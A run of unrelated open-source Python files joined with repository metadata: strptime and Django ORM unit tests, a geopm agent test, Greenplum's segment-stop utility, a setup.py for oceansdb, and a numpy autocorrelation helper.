"""Helper fxn in testing."""
strf_output = time.strftime("%" + directive, self.time_tuple)
strp_output = _strptime.strptime(strf_output, "%" + directive)
self.failUnless(strp_output[position] == self.time_tuple[position],
"testing of '%s' directive failed; '%s' -> %s != %s" %
(directive, strf_output, strp_output[position],
self.time_tuple[position]))
def test_year(self):
# Test that the year is handled properly
for directive in ('y', 'Y'):
self.helper(directive, 0)
# Must also make sure %y values are correct for bounds set by Open Group
for century, bounds in ((1900, ('69', '99')), (2000, ('00', '68'))):
for bound in bounds:
strp_output = _strptime.strptime(bound, '%y')
expected_result = century + int(bound)
self.failUnless(strp_output[0] == expected_result,
"'y' test failed; passed in '%s' "
"and returned '%s'" % (bound, strp_output[0]))
def test_month(self):
# Test for month directives
for directive in ('B', 'b', 'm'):
self.helper(directive, 1)
def test_day(self):
# Test for day directives
self.helper('d', 2)
def test_hour(self):
# Test hour directives
self.helper('H', 3)
strf_output = time.strftime("%I %p", self.time_tuple)
strp_output = _strptime.strptime(strf_output, "%I %p")
self.failUnless(strp_output[3] == self.time_tuple[3],
"testing of '%%I %%p' directive failed; '%s' -> %s != %s" %
(strf_output, strp_output[3], self.time_tuple[3]))
def test_minute(self):
# Test minute directives
self.helper('M', 4)
def test_second(self):
# Test second directives
self.helper('S', 5)
def test_weekday(self):
# Test weekday directives
for directive in ('A', 'a', 'w'):
self.helper(directive,6)
def test_julian(self):
# Test julian directives
self.helper('j', 7)
def test_timezone(self):
# Test timezone directives.
# When gmtime() is used with %Z, entire result of strftime() is empty.
# Check for equal timezone names deals with bad locale info when this
# occurs; first found in FreeBSD 4.4.
strp_output = _strptime.strptime("UTC", "%Z")
self.failUnlessEqual(strp_output.tm_isdst, 0)
strp_output = _strptime.strptime("GMT", "%Z")
self.failUnlessEqual(strp_output.tm_isdst, 0)
if sys.platform == "mac":
# Timezones don't really work on MacOS9
return
time_tuple = time.localtime()
strf_output = time.strftime("%Z") #UTC does not have a timezone
strp_output = _strptime.strptime(strf_output, "%Z")
locale_time = _strptime.LocaleTime()
if time.tzname[0] != time.tzname[1] or not time.daylight:
self.failUnless(strp_output[8] == time_tuple[8],
"timezone check failed; '%s' -> %s != %s" %
(strf_output, strp_output[8], time_tuple[8]))
else:
self.failUnless(strp_output[8] == -1,
"LocaleTime().timezone has duplicate values and "
"time.daylight but timezone value not set to -1")
def test_bad_timezone(self):
# Explicitly test possibility of bad timezone;
# when time.tzname[0] == time.tzname[1] and time.daylight
if sys.platform == "mac":
return #MacOS9 has severely broken timezone support.
tz_name = time.tzname[0]
if tz_name.upper() in ("UTC", "GMT"):
return
try:
original_tzname = time.tzname
original_daylight = time.daylight
time.tzname = (tz_name, tz_name)
time.daylight = 1
tz_value = _strptime.strptime(tz_name, "%Z")[8]
self.failUnlessEqual(tz_value, -1,
"%s lead to a timezone value of %s instead of -1 when "
"time.daylight set to %s and passing in %s" %
(time.tzname, tz_value, time.daylight, tz_name))
finally:
time.tzname = original_tzname
time.daylight = original_daylight
def test_date_time(self):
# Test %c directive
for position in range(6):
self.helper('c', position)
def test_date(self):
# Test %x directive
for position in range(0,3):
self.helper('x', position)
def test_time(self):
# Test %X directive
for position in range(3,6):
self.helper('X', position)
def test_percent(self):
# Make sure % signs are handled properly
strf_output = time.strftime("%m %% %Y", self.time_tuple)
strp_output = _strptime.strptime(strf_output, "%m %% %Y")
self.failUnless(strp_output[0] == self.time_tuple[0] and
strp_output[1] == self.time_tuple[1],
"handling of percent sign failed")
def test_caseinsensitive(self):
# Should handle names case-insensitively.
strf_output = time.strftime("%B", self.time_tuple)
self.failUnless(_strptime.strptime(strf_output.upper(), "%B"),
"strptime does not handle ALL-CAPS names properly")
self.failUnless(_strptime.strptime(strf_output.lower(), "%B"),
"strptime does not handle lowercase names properly")
self.failUnless(_strptime.strptime(strf_output.capitalize(), "%B"),
"strptime does not handle capword names properly")
def test_defaults(self):
# Default return value should be (1900, 1, 1, 0, 0, 0, 0, 1, 0)
defaults = (1900, 1, 1, 0, 0, 0, 0, 1, -1)
strp_output = _strptime.strptime('1', '%m')
self.failUnless(strp_output == defaults,
"Default values for strptime() are incorrect;"
" %s != %s" % (strp_output, defaults))
def test_escaping(self):
# Make sure all characters that have regex significance are escaped.
# Parentheses are in a purposeful order; will cause an error of
# unbalanced parentheses when the regex is compiled if they are not
# escaped.
# Test instigated by bug #796149 .
need_escaping = ".^$*+?{}\[]|)("
self.failUnless(_strptime.strptime(need_escaping, need_escaping))
class Strptime12AMPMTests(unittest.TestCase):
"""Test a _strptime regression in '%I %p' at 12 noon (12 PM)"""
def test_twelve_noon_midnight(self):
eq = self.assertEqual
eq(time.strptime('12 PM', '%I %p')[3], 12)
eq(time.strptime('12 AM', '%I %p')[3], 0)
eq(_strptime.strptime('12 PM', '%I %p')[3], 12)
eq(_strptime.strptime('12 AM', '%I %p')[3], 0)
class JulianTests(unittest.TestCase):
"""Test a _strptime regression that all julian (1-366) are accepted"""
def test_all_julian_days(self):
eq = self.assertEqual
for i in range(1, 367):
# use 2004, since it is a leap year, we have 366 days
eq(_strptime.strptime('%d 2004' % i, '%j %Y')[7], i)
class CalculationTests(unittest.TestCase):
"""Test that strptime() fills in missing info correctly"""
def setUp(self):
self.time_tuple = time.gmtime()
def test_julian_calculation(self):
        # Make sure that when the Julian day is missing it is calculated
format_string = "%Y %m %d %H %M %S %w %Z"
result = _strptime.strptime(time.strftime(format_string, self.time_tuple),
format_string)
self.failUnless(result.tm_yday == self.time_tuple.tm_yday,
"Calculation of tm_yday failed; %s != %s" %
(result.tm_yday, self.time_tuple.tm_yday))
def test_gregorian_calculation(self):
# Test that Gregorian date can be calculated from Julian day
format_string = "%Y %H %M %S %w %j %Z"
result = _strptime.strptime(time.strftime(format_string, self.time_tuple),
format_string)
self.failUnless(result.tm_year == self.time_tuple.tm_year and
result.tm_mon == self.time_tuple.tm_mon and
result.tm_mday == self.time_tuple.tm_mday,
"Calculation of Gregorian date failed;"
"%s-%s-%s != %s-%s-%s" %
(result.tm_year, result.tm_mon, result.tm_mday,
self.time_tuple.tm_year, self.time_tuple.tm_mon,
self.time_tuple.tm_mday))
def test_day_of_week_calculation(self):
# Test that the day of the week is calculated as needed
format_string = "%Y %m %d %H %S %j %Z"
result = _strptime.strptime(time.strftime(format_string, self.time_tuple),
format_string)
self.failUnless(result.tm_wday == self.time_tuple.tm_wday,
"Calculation of day of the week failed;"
"%s != %s" % (result.tm_wday, self.time_tuple.tm_wday))
def test_week_of_year_and_day_of_week_calculation(self):
# Should be able to infer date if given year, week of year (%U or %W)
# and day of the week
def test_helper(ymd_tuple, test_reason):
for directive in ('W', 'U'):
format_string = "%%Y %%%s %%w" % directive
dt_date = datetime_date(*ymd_tuple)
strp_input = dt_date.strftime(format_string)
strp_output = _strptime.strptime(strp_input, format_string)
self.failUnless(strp_output[:3] == ymd_tuple,
"%s(%s) test failed w/ '%s': %s != %s (%s != %s)" %
(test_reason, directive, strp_input,
strp_output[:3], ymd_tuple,
strp_output[7], dt_date.timetuple()[7]))
test_helper((1901, 1, 3), "week 0")
test_helper((1901, 1, 8), "common case")
test_helper((1901, 1, 13), "day on Sunday")
test_helper((1901, 1, 14), "day on Monday")
test_helper((1905, 1, 1), "Jan 1 on Sunday")
test_helper((1906, 1, 1), "Jan 1 on Monday")
test_helper((1906, 1, 7), "first Sunday in a year starting on Monday")
test_helper((1905, 12, 31), "Dec 31 on Sunday")
test_helper((1906, 12, 31), "Dec 31 on Monday")
test_helper((2008, 12, 29), "Monday in the last week of the year")
test_helper((2008, 12, 22), "Monday in the second-to-last week of the "
"year")
test_helper((1978, 10, 23), "randomly chosen date")
test_helper((2004, 12, 18), "randomly chosen date")
test_helper((1978, 10, 23), "year starting and ending on Monday while "
"date not on Sunday or Monday")
test_helper((1917, 12, 17), "year starting and ending on Monday with "
"a Monday not at the beginning or end "
"of the year")
test_helper((1917, 12, 31), "Dec 31 on Monday with year starting and "
"ending on Monday")
class CacheTests(unittest.TestCase):
"""Test that caching works properly."""
def test_time_re_recreation(self):
# Make sure cache is recreated when current locale does not match what
# cached object was created with.
_strptime.strptime("10", "%d")
_strptime.strptime("2005", "%Y")
_strptime._TimeRE_cache.locale_time.lang = "Ni"
original_time_re = id(_strptime._TimeRE_cache)
_strptime.strptime("10", "%d")
self.failIfEqual(original_time_re, id(_strptime._TimeRE_cache))
self.failUnlessEqual(len(_strptime._regex_cache), 1)
def test_regex_cleanup(self):
# Make sure cached regexes are discarded when cache becomes "full".
try:
del _strptime._regex_cache['%d']
except KeyError:
pass
bogus_key = 0
while len(_strptime._regex_cache) <= _strptime._CACHE_MAX_SIZE:
_strptime._regex_cache[bogus_key] = None
bogus_key += 1
_strptime.strptime("10", "%d")
self.failUnlessEqual(len(_strptime._regex_cache), 1)
def test_new_localetime(self):
# A new LocaleTime instance should be created when a new TimeRE object
# is created.
locale_time_id = id(_strptime._TimeRE_cache.locale_time)
_strptime._TimeRE_cache.locale_time.lang = "Ni"
_strptime.strptime("10", "%d")
self.failIfEqual(locale_time_id,
id(_strptime._TimeRE_cache.locale_time))
def test_main():
test_support.run_unittest(
getlang_Tests,
LocaleTime_Tests,
TimeRETests,
StrptimeTests,
Strptime12AMPMTests,
JulianTests,
CalculationTests,
CacheTests
)
if __name__ == '__main__':
test_main()
|
gpl-2.0
|
geopm/geopm
|
scripts/test/TestAgent.py
|
1
|
2853
|
#!/usr/bin/env python3
#
# Copyright (c) 2015 - 2021, Intel Corporation
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import absolute_import
import unittest
import json
import geopmpy.agent
class TestAgent(unittest.TestCase):
def test_policy_names(self):
for agent in geopmpy.agent.names():
policy = geopmpy.agent.policy_names(agent)
self.assertTrue(type(policy) is list)
def test_sample_names(self):
for agent in geopmpy.agent.names():
sample = geopmpy.agent.sample_names(agent)
self.assertTrue(type(sample) is list)
def test_agent_names(self):
names = geopmpy.agent.names()
expected = set(['power_balancer', 'power_governor',
'frequency_map', 'monitor'])
self.assertEqual(expected, set(names))
def test_json(self):
for agent in geopmpy.agent.names():
policy_names = geopmpy.agent.policy_names(agent)
exp_policy = {}
for pp in policy_names:
exp_policy[pp] = 'NAN'
policy_val = [float('nan')] * len(policy_names)
json_str = geopmpy.agent.policy_json(agent, policy_val)
res_policy = json.loads(json_str)
self.assertEqual(exp_policy, res_policy)
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
cjcjameson/gpdb
|
gpMgmt/sbin/gpsegstop.py
|
24
|
8204
|
#!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2008. All Rights Reserved.
#
#
# Internal Use Function.
#
#
#
# THIS IMPORT MUST COME FIRST
#
# import mainUtils FIRST to get python version check
from gppylib.mainUtils import *
import os, sys, time, signal
from optparse import Option, OptionGroup, OptionParser, OptionValueError, SUPPRESS_USAGE
from gppylib.gpparseopts import OptParser, OptChecker
from gppylib import gplog
from gppylib.commands import base
from gppylib.commands import unix
from gppylib.commands import gp
from gppylib.commands.gp import SEGMENT_STOP_TIMEOUT_DEFAULT
from gppylib.commands import pg
from gppylib.db import dbconn
from gppylib import pgconf
from gppylib.commands.gp import is_pid_postmaster
description = ("""
This utility is NOT SUPPORTED and is for internal use only.
It stops a set of one or more segment databases.
""")
logger = gplog.get_default_logger()
# -------------------------------------------------------------------------
class SegStopStatus:
def __init__(self, datadir, stopped, reason):
self.datadir = datadir
self.stopped = stopped
self.reason = reason
def __str__(self):
return "STATUS--DIR:%s--STOPPED:%s--REASON:%s" % (self.datadir, self.stopped, self.reason)
class SegStop(base.Command):
def __init__(self, name, db, mode, timeout):
self.name = name
self.db = db
self.mode = mode
self.timeout = timeout
self.result = None
self.port = None
self.datadir = None
self.logger = logger
base.Command.__init__(self, name=self.name, cmdStr='Stop an individual segment on the host', ctxt=None,
remoteHost=None)
def get_datadir_and_port(self):
return self.db.split(':')[0:2]
def get_results(self):
return self.result
def run(self):
try:
self.datadir, self.port = self.get_datadir_and_port()
cmd = gp.SegmentStop('segment shutdown', self.datadir, mode=self.mode, timeout=self.timeout)
cmd.run()
results = cmd.get_results()
is_shutdown = False
if results.rc == 0:
cmd = gp.SegmentIsShutDown('check if shutdown', self.datadir)
cmd.run()
if cmd.is_shutdown():
status = SegStopStatus(self.datadir, True, "Shutdown Succeeded")
self.result = status
is_shutdown = True
# MPP-16171
#
elif self.mode == 'immediate':
status = SegStopStatus(self.datadir, True, "Shutdown Immediate")
self.result = status
is_shutdown = True
# read pid and datadir from /tmp/.s.PGSQL.<port>.lock file
name = "failed segment '%s'" % self.db
(succeeded, mypid, file_datadir) = pg.ReadPostmasterTempFile.local(name, self.port).getResults()
if not is_shutdown:
if succeeded and file_datadir == self.datadir:
# now try to terminate the process, first trying with
                    # SIGTERM and working our way up to SIGABRT, sleeping
# in between to give the process a moment to exit
#
unix.kill_sequence(mypid)
if not unix.check_pid(mypid):
lockfile = "/tmp/.s.PGSQL.%s" % self.port
if os.path.exists(lockfile):
self.logger.info("Clearing segment instance lock files")
os.remove(lockfile)
status = SegStopStatus(self.datadir, True,
"Forceful termination success: rc: %d stdout: %s stderr: %s." % (
results.rc, results.stdout, results.stderr))
try:
unix.kill_9_segment_processes(self.datadir, self.port, mypid)
if unix.check_pid(mypid) and mypid != -1:
status = SegStopStatus(self.datadir, False,
"Failed forceful termnation: rc: %d stdout: %s stderr: %s." % (
results.rc, results.stdout, results.stderr))
self.result = status
except Exception as e:
logger.error('Failed forceful termination of segment %s: (%s)' % (self.datadir, str(e)))
self.result = SegStopStatus(self.datadir, False,
'Failed forceful termination of segment! (%s)' % str(e))
return self.result
except Exception as e:
logger.exception(e)
self.result = SegStopStatus(self.datadir, False, 'Shutdown failed! %s' % str(e))
return self.result
# -------------------------------------------------------------------------
class GpSegStop:
######
def __init__(self, dblist, mode, gpversion, timeout=SEGMENT_STOP_TIMEOUT_DEFAULT, logfileDirectory=False):
self.dblist = dblist
self.mode = mode
self.expected_gpversion = gpversion
self.timeout = timeout
self.gphome = os.path.abspath(os.pardir)
self.actual_gpversion = gp.GpVersion.local('local GP software version check', self.gphome)
if self.actual_gpversion != self.expected_gpversion:
raise Exception("Local Software Version does not match what is expected.\n"
"The local software version is: '%s'\n"
"But we were expecting it to be: '%s'\n"
"Please review and correct" % (self.actual_gpversion, self.expected_gpversion))
self.logger = logger
self.pool = None
self.logfileDirectory = logfileDirectory
######
def run(self):
results = []
failures = []
self.logger.info("Issuing shutdown commands to local segments...")
self.pool = base.WorkerPool()
for db in self.dblist:
cmd = SegStop('segment shutdown', db=db, mode=self.mode, timeout=self.timeout)
self.pool.addCommand(cmd)
self.pool.join()
failed = False
for cmd in self.pool.getCompletedItems():
result = cmd.get_results()
if not result.stopped:
failed = True
results.append(result)
# Log the results!
status = '\nCOMMAND RESULTS\n'
for result in results:
status += str(result) + "\n"
self.logger.info(status)
return 1 if failed else 0
######
def cleanup(self):
if self.pool:
self.pool.haltWork()
@staticmethod
def createParser():
parser = OptParser(option_class=OptChecker,
description=' '.join(description.split()),
version='%prog version $Revision: #12 $')
parser.setHelp([])
addStandardLoggingAndHelpOptions(parser, includeNonInteractiveOption=False)
parser.add_option("-D", "--db", dest="dblist", action="append", type="string")
parser.add_option("-V", "--gp-version", dest="gpversion", metavar="GP_VERSION",
help="expected software version")
parser.add_option("-m", "--mode", dest="mode", metavar="<MODE>",
help="how to shutdown. modes are smart,fast, or immediate")
parser.add_option("-t", "--timeout", dest="timeout", type="int", default=SEGMENT_STOP_TIMEOUT_DEFAULT,
help="seconds to wait")
return parser
@staticmethod
def createProgram(options, args):
logfileDirectory = options.ensure_value("logfileDirectory", False)
return GpSegStop(options.dblist, options.mode, options.gpversion, options.timeout,
logfileDirectory=logfileDirectory)
# -------------------------------------------------------------------------
if __name__ == '__main__':
mainOptions = {'setNonuserOnToolLogger': True}
simple_main(GpSegStop.createParser, GpSegStop.createProgram, mainOptions)
|
apache-2.0
|
castelao/oceansdb
|
setup.py
|
1
|
1497
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from setuptools import setup
from codecs import open
with open('README.rst', encoding='utf-8') as f:
readme = f.read()
with open('HISTORY.rst', encoding='utf-8') as f:
history = f.read().replace('.. :changelog:', '')
with open('requirements.txt', encoding='utf-8') as f:
requirements = f.read()
setup(
name='oceansdb',
version='0.8.14',
description="Package to subsample ocean climatologies and reference data.",
long_description=readme + '\n\n' + history,
author="Guilherme Castelao",
author_email='[email protected]',
url='https://github.com/castelao/oceansdb',
packages=['oceansdb'],
package_dir={'oceansdb': 'oceansdb'},
include_package_data=True,
install_requires=requirements,
license='3-clause BSD',
zip_safe=False,
keywords='WOA World Ocean Atlas climatology oceanographic data' +
' oceanography ETOPO temperature salinity bathymetry',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering',
]
)
|
bsd-3-clause
|
mark-burnett/filament-dynamics
|
actin_dynamics/numerical/old_correlation.py
|
1
|
5017
|
# Copyright (C) 2011 Mark Burnett
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#import itertools
#import math
#
#import numpy
#
#def collection_stats(value_collection):
# all_vals = list(itertools.chain(*value_collection))
# mean = numpy.mean(all_vals)
# std = numpy.std(all_vals)
# return mean, std
#
## NOTE weighted_avg_and_std taken from EOL on StackOverflow
## http://stackoverflow.com/questions/2413522/weighted-std-in-numpy
#def weighted_avg_and_std(values, weights):
# """
# Returns the weighted average and standard deviation.
#
# values, weights -- Numpy ndarrays with the same shape.
# """
# average = numpy.average(values, weights=weights)
# variance = numpy.dot(weights, (values-average)**2)/weights.sum() # Fast and numerically precise
# return (average, math.sqrt(variance))
#
#
#def get_values_at_time(flat_data, time):
# results = []
# for times, values in flat_data:
# index = bisect.bisect_left(times, time)
# try:
# results.append(values[index])
# except IndexError:
# pass
# return results
#
#def aggregate_autocorrelation(sample_period, value_collection):
# big_sum = 0
# big_count = 0
# for single_values in value_collection:
# big_sum += sum(single_values)
# big_count += len(single_values)
# big_mean = float(big_sum) / big_count
# print 'BM', big_mean
#
# correlations = []
# counts = []
# for single_values in value_collection:
# ac_values, ac_counts = autocorrelate(single_values, mean=big_mean)
# correlations.append(ac_values)
# counts.append(ac_counts)
#
# maxlen = max(map(len, correlations))
# collated_acs = []
# collated_counts = []
# for i in xrange(maxlen):
# local_acs = []
# local_counts = []
# collated_acs.append(local_acs)
# collated_counts.append(local_counts)
# for acs, cts in itertools.izip(correlations, counts):
# if i < len(acs):
# local_acs.append(acs[i])
# local_counts.append(cts[i])
#
# taus = numpy.arange(maxlen) * sample_period
# ac_means = []
# ac_errors = []
# for acs, cts in itertools.izip(collated_acs, collated_counts):
# acs = numpy.array(acs)
# cts = numpy.array(cts)
# mean, std = weighted_avg_and_std(acs, cts)
# ctssum = float(cts.sum())
# # XXX This error is not representitive for small samples.
# error = std / math.sqrt(ctssum)
## if ctssum > 1:
## error = std / math.sqrt(ctssum)
## else:
## error = mean
# ac_means.append(mean)
# ac_errors.append(error)
#
# return taus, ac_means, ac_errors
#
#def autocorrelate(values, mean=1):
# values = numpy.array(values)
# result, count = correlate(values, values, mean=mean)
# results = [result]
# counts = [count]
# for i in xrange(1, len(values)):
# result, count = correlate(values[i:], values[:-i], mean=mean)
# results.append(result)
# counts.append(count)
# return results, counts
#
#def correlate(a, b, mean=1):
# length = len(a)
# return sum(a * b) / mean / float(length), length
import itertools
import numpy
def collection_stats(value_collection):
all_vals = numpy.fromiter(itertools.chain(*value_collection), dtype='double')
mean = numpy.mean(all_vals)
std = numpy.std(all_vals)
return mean, std
def aggregate_autocorrelation(sample_period, value_collection):
big_mean, big_std = collection_stats(value_collection)
correlation_collection = [autocorrelate(values, normalization=big_mean)
for values in value_collection]
maxlen = max(map(len, correlation_collection))
collated_correlations = []
for i in xrange(maxlen):
local_correlations = []
collated_correlations.append(local_correlations)
for correlations in correlation_collection:
if i < len(correlations):
local_correlations.append(correlations[i])
taus = numpy.arange(maxlen) * sample_period
means = [numpy.mean(acs) for acs in collated_correlations]
return taus, means, [0 for t in taus]
def autocorrelate(values, normalization=1):
length = len(values)
values = numpy.array(values, dtype='double')
return numpy.correlate(values, values, mode='same')[length/2:] / (
length * normalization)
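# Hedged usage sketch (added for illustration; the data below is made up): each
# entry in value_collection is one trace of equally spaced samples taken every
# sample_period seconds. aggregate_autocorrelation returns the lag times, the mean
# autocorrelation at each lag, and placeholder zero errors.
if __name__ == '__main__':
    example_collection = [[1.0, 2.0, 1.5, 0.5, 1.2],
                          [0.8, 1.9, 1.2, 0.7, 1.1]]
    taus, means, errors = aggregate_autocorrelation(0.1, example_collection)
    print taus, means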
|
gpl-3.0
|
ytjiang/django
|
tests/extra_regress/tests.py
|
207
|
15018
|
from __future__ import unicode_literals
import datetime
from collections import OrderedDict
from django.contrib.auth.models import User
from django.test import TestCase
from .models import Order, RevisionableModel, TestObject
class ExtraRegressTests(TestCase):
def setUp(self):
self.u = User.objects.create_user(
username="fred",
password="secret",
email="[email protected]"
)
def test_regression_7314_7372(self):
"""
Regression tests for #7314 and #7372
"""
rm = RevisionableModel.objects.create(
title='First Revision',
when=datetime.datetime(2008, 9, 28, 10, 30, 0)
)
self.assertEqual(rm.pk, rm.base.pk)
rm2 = rm.new_revision()
rm2.title = "Second Revision"
rm.when = datetime.datetime(2008, 9, 28, 14, 25, 0)
rm2.save()
self.assertEqual(rm2.title, 'Second Revision')
self.assertEqual(rm2.base.title, 'First Revision')
self.assertNotEqual(rm2.pk, rm.pk)
self.assertEqual(rm2.base.pk, rm.pk)
# Queryset to match most recent revision:
qs = RevisionableModel.objects.extra(
where=["%(table)s.id IN (SELECT MAX(rev.id) FROM %(table)s rev GROUP BY rev.base_id)" % {
'table': RevisionableModel._meta.db_table,
}]
)
self.assertQuerysetEqual(qs,
[('Second Revision', 'First Revision')],
transform=lambda r: (r.title, r.base.title)
)
# Queryset to search for string in title:
qs2 = RevisionableModel.objects.filter(title__contains="Revision")
self.assertQuerysetEqual(qs2,
[
('First Revision', 'First Revision'),
('Second Revision', 'First Revision'),
],
transform=lambda r: (r.title, r.base.title),
ordered=False
)
# Following queryset should return the most recent revision:
self.assertQuerysetEqual(qs & qs2,
[('Second Revision', 'First Revision')],
transform=lambda r: (r.title, r.base.title),
ordered=False
)
def test_extra_stay_tied(self):
# Extra select parameters should stay tied to their corresponding
# select portions. Applies when portions are updated or otherwise
# moved around.
qs = User.objects.extra(
select=OrderedDict((("alpha", "%s"), ("beta", "2"), ("gamma", "%s"))),
select_params=(1, 3)
)
qs = qs.extra(select={"beta": 4})
qs = qs.extra(select={"alpha": "%s"}, select_params=[5])
self.assertEqual(
list(qs.filter(id=self.u.id).values('alpha', 'beta', 'gamma')),
[{'alpha': 5, 'beta': 4, 'gamma': 3}]
)
def test_regression_7957(self):
"""
Regression test for #7957: Combining extra() calls should leave the
corresponding parameters associated with the right extra() bit. I.e.
internal dictionary must remain sorted.
"""
self.assertEqual(
(User.objects
.extra(select={"alpha": "%s"}, select_params=(1,))
.extra(select={"beta": "%s"}, select_params=(2,))[0].alpha),
1
)
self.assertEqual(
(User.objects
.extra(select={"beta": "%s"}, select_params=(1,))
.extra(select={"alpha": "%s"}, select_params=(2,))[0].alpha),
2
)
def test_regression_7961(self):
"""
Regression test for #7961: When not using a portion of an
extra(...) in a query, remove any corresponding parameters from the
query as well.
"""
self.assertEqual(
list(User.objects
.extra(select={"alpha": "%s"}, select_params=(-6,))
.filter(id=self.u.id)
.values_list('id', flat=True)),
[self.u.id]
)
def test_regression_8063(self):
"""
Regression test for #8063: limiting a query shouldn't discard any
extra() bits.
"""
qs = User.objects.all().extra(where=['id=%s'], params=[self.u.id])
self.assertQuerysetEqual(qs, ['<User: fred>'])
self.assertQuerysetEqual(qs[:1], ['<User: fred>'])
def test_regression_8039(self):
"""
Regression test for #8039: Ordering sometimes removed relevant tables
from extra(). This test is the critical case: ordering uses a table,
but then removes the reference because of an optimization. The table
should still be present because of the extra() call.
"""
self.assertQuerysetEqual(
(Order.objects
.extra(where=["username=%s"], params=["fred"], tables=["auth_user"])
.order_by('created_by')),
[]
)
def test_regression_8819(self):
"""
Regression test for #8819: Fields in the extra(select=...) list
should be available to extra(order_by=...).
"""
self.assertQuerysetEqual(
User.objects.filter(pk=self.u.id).extra(select={'extra_field': 1}).distinct(),
['<User: fred>']
)
self.assertQuerysetEqual(
User.objects.filter(pk=self.u.id).extra(select={'extra_field': 1}, order_by=['extra_field']),
['<User: fred>']
)
self.assertQuerysetEqual(
User.objects.filter(pk=self.u.id).extra(select={'extra_field': 1}, order_by=['extra_field']).distinct(),
['<User: fred>']
)
def test_dates_query(self):
"""
When calling the dates() method on a queryset with extra selection
columns, we can (and should) ignore those columns. They don't change
the result and cause incorrect SQL to be produced otherwise.
"""
RevisionableModel.objects.create(
title='First Revision',
when=datetime.datetime(2008, 9, 28, 10, 30, 0)
)
self.assertQuerysetEqual(
RevisionableModel.objects.extra(select={"the_answer": 'id'}).datetimes('when', 'month'),
[datetime.datetime(2008, 9, 1, 0, 0)],
transform=lambda d: d,
)
def test_values_with_extra(self):
"""
Regression test for #10256... If there is a values() clause, Extra
columns are only returned if they are explicitly mentioned.
"""
obj = TestObject(first='first', second='second', third='third')
obj.save()
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values()),
[{'bar': 'second', 'third': 'third', 'second': 'second', 'whiz': 'third', 'foo': 'first', 'id': obj.pk, 'first': 'first'}]
)
# Extra clauses after an empty values clause are still included
self.assertEqual(
list(TestObject.objects.values().extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third'))))),
[{'bar': 'second', 'third': 'third', 'second': 'second', 'whiz': 'third', 'foo': 'first', 'id': obj.pk, 'first': 'first'}]
)
# Extra columns are ignored if not mentioned in the values() clause
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values('first', 'second')),
[{'second': 'second', 'first': 'first'}]
)
# Extra columns after a non-empty values() clause are ignored
self.assertEqual(
list(TestObject.objects.values('first', 'second').extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third'))))),
[{'second': 'second', 'first': 'first'}]
)
# Extra columns can be partially returned
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values('first', 'second', 'foo')),
[{'second': 'second', 'foo': 'first', 'first': 'first'}]
)
# Also works if only extra columns are included
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values('foo', 'whiz')),
[{'foo': 'first', 'whiz': 'third'}]
)
# Values list works the same way
# All columns are returned for an empty values_list()
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list()),
[('first', 'second', 'third', obj.pk, 'first', 'second', 'third')]
)
# Extra columns after an empty values_list() are still included
self.assertEqual(
list(TestObject.objects.values_list().extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third'))))),
[('first', 'second', 'third', obj.pk, 'first', 'second', 'third')]
)
# Extra columns ignored completely if not mentioned in values_list()
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('first', 'second')),
[('first', 'second')]
)
# Extra columns after a non-empty values_list() clause are ignored completely
self.assertEqual(
list(TestObject.objects.values_list('first', 'second').extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third'))))),
